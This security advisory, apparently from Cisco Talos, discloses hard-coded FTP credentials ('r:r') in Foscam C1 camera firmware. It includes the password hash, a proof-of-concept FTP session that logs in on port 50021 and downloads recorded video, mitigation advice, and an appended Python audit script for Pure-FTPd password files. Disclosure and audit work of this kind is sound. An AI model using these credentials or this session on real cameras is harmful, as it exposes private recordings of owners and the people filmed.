### Summary

Hard-coded FTP credentials (r:r) are included in the Foscam C1 running firmware 1.9.1.12. Knowledge of these credentials would allow remote access to any cameras found on the internet that do not have port 50021 blocked by an intermediate device.

### Tested Versions

Foscam C1 Firmware Version 1.9.1.12

### Product URLs

Foscam

### CVSSv3 Score

9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

### CWE

CWE-259: Use of Hard-coded Password

### Details

The file found at '/mtd/app/bin/ftpd/pureftpd.passwd' contains the following hash:

```
r:$1$whR6Mhk0$FR1VT/mX5D/qwRsgCkHLO.:1001:1001::/mnt/sd/./::::::::::::
```

This hash resolves to a simple user/pass combo of 'r:r'. The user/pass of r:r permits anyone to log into a Foscam camera and have full read/write to the mounted Micro-SD card, which contains .avi videos and .jpg snapshots. If the camera has a microphone, the .avi videos will have audio recording as well. An attacker armed with this knowledge can connect remotely to the target camera and dump potentially sensitive data.

### Exploit Proof-of-Concept

```
$ ftp 192.168.1.19 50021
Connected to 192.168.1.19 (192.168.1.19).
220---------- Welcome to Pure-FTPd [privsep] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 19:04. Server port: 50021.
220-This is a private system - No anonymous login
220 You will be disconnected after 15 minutes of inactivity.
Name (192.168.1.19:user): r
331 User r OK. Password required
Password:
230 OK. Current directory is /
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
227 Entering Passive Mode (192,168,1,19,80,232)
150 Accepted data connection
drwxrwxrwx 3 0 0 32768 Sep 28 13:12 IPCamera
226-Options: -l
226 1 matches total
ftp> cd IPCamera
250 OK. Current directory is /IPCamera
ftp> ls
227 Entering Passive Mode (192,168,1,19,200,199)
150 Accepted data connection
drwxrwxrwx 4 0 0 32768 Jan 1 2010 C1_000000001
226-Options: -l
226 1 matches total
ftp> cd C1_000000001
250 OK. Current directory is /IPCamera/C1_000000001
ftp> ls
227 Entering Passive Mode (192,168,1,19,112,123)
150 Accepted data connection
drwxrwxrwx 48 0 0 32768 Nov 13 15:57 record
drwxrwxrwx 48 0 0 32768 Nov 13 15:57 snap
226-Options: -l
226 2 matches total
ftp> cd record
250 OK. Current directory is /IPCamera/C1_000000001/record
ftp> ls
227 Entering Passive Mode (192,168,1,19,54,239)
150 Accepted data connection
drwxrwxrwx 3 0 0 32768 Nov 1 16:54 20161101
drwxrwxrwx 3 0 0 32768 Nov 5 01:29 20161104
drwxrwxrwx 3 0 0 32768 Nov 5 19:32 20161105
drwxrwxrwx 3 0 0 32768 Nov 7 16:32 20161107
drwxrwxrwx 3 0 0 32768 Nov 8 20:04 20161108
drwxrwxrwx 3 0 0 32768 Nov 10 02:05 20161109
drwxrwxrwx 3 0 0 32768 Nov 13 15:57 20161113
226-Options: -l
226 46 matches total
ftp> cd 20161104
250 OK. Current directory is /IPCamera/C1_000000001/record/20161104
ftp> ls
227 Entering Passive Mode (192,168,1,19,69,159)
150 Accepted data connection
drwxrwxrwx 2 0 0 32768 Nov 5 01:34 20161104_202945
226-Options: -l
226 1 matches total
ftp> cd 20161104_202945
250 OK. Current directory is /IPCamera/C1_000000001/record/20161104/20161104_202945
ftp> ls
227 Entering Passive Mode (192,168,1,19,248,107)
150 Accepted data connection
-rwxrwxrwx 1 0 0 12618644 Nov 5 01:34 SDalarm_20161104_202945.avi
-rwxrwxrwx 1 0 0 320000 Nov 5 01:34 index.dat
226-Options: -l
226 2 matches total
ftp> get SDalarm_20161104_202945.avi
local: SDalarm_20161104_202945.avi remote: SDalarm_20161104_202945.avi
227 Entering Passive Mode (192,168,1,19,243,42)
150-Accepted data connection
150 12322.9 kbytes to download
quit
226-File successfully transferred
226 30.430 seconds (measured here), 404.96 Kbytes per second
12618644 bytes received in 30.4 secs (414.43 Kbytes/sec)
ftp> quit
221-Goodbye. You uploaded 0 and downloaded 12323 kbytes.
221 Logout.
$ exit
exit
```

### Mitigation

Exploitation relies on the availability of port 50021 (the default FTP port that this camera uses). Preventing access to this port or disabling FTP completely will help mitigate this vulnerability.

### Timeline

* 2016-11-29 - Vendor disclosure
* 2017-06-19 - Public release

### CREDIT

* Discovered by Richard Harman and Dave McDaniel of Cisco Talos
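
The `pureftpd.passwd` line quoted under Details can be checked mechanically during firmware review. The following is an added example, not code from Talos or Foscam: it parses a Pure-FTPd virtual-user line and reports the weaknesses the advisory describes. The function names `md5crypt` and `audit` and the finding labels are this example's own; the field order assumed is Pure-FTPd's documented 18-field passwd layout.

```python
import hashlib

# The pureftpd.passwd line quoted in the advisory's Details section.
SAMPLE = "r:$1$whR6Mhk0$FR1VT/mX5D/qwRsgCkHLO.:1001:1001::/mnt/sd/./::::::::::::"
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

def md5crypt(pw: bytes, salt: bytes) -> str:
    """Standard $1$ MD5-crypt, so the check needs no external library."""
    alt = hashlib.md5(pw + salt + pw).digest()
    buf = pw + b"$1$" + salt + (alt * (len(pw) // 16 + 1))[:len(pw)]
    n = len(pw)
    while n:
        buf += b"\0" if n & 1 else pw[:1]
        n >>= 1
    d = hashlib.md5(buf).digest()
    for i in range(1000):  # fixed 1000-round stretching loop
        m = pw if i & 1 else d
        if i % 3:
            m += salt
        if i % 7:
            m += pw
        m += d if i & 1 else pw
        d = hashlib.md5(m).digest()
    out = ""
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        v = d[a] << 16 | d[b] << 8 | d[c]
        for _ in range(4):
            out += ITOA64[v & 63]
            v >>= 6
    out += ITOA64[d[11] & 63] + ITOA64[d[11] >> 6]
    return "$1$" + salt.decode() + "$" + out

def audit(line: str) -> dict:
    """Parse one virtual-user line (colon-separated fields) and list findings."""
    f = line.strip().split(":")
    account, pw_hash, home = f[0], f[1], f[5]
    findings = []
    if pw_hash.startswith("$1$"):
        findings.append("weak-scheme:md5crypt")
        salt = pw_hash.split("$")[2].encode()
        if md5crypt(account.encode(), salt) == pw_hash:
            findings.append("password-equals-username")
    if len(f) > 15 and not f[15]:  # field 16: authorized client IPs
        findings.append("no-client-ip-allowlist")
    # Pure-FTPd treats "/./" in the home path as the chroot point.
    chroot = home.split("/./")[0] if "/./" in home else None
    return {"account": account, "uid": int(f[2]), "chroot": chroot,
            "findings": findings}

if __name__ == "__main__":
    print(audit(SAMPLE))
```
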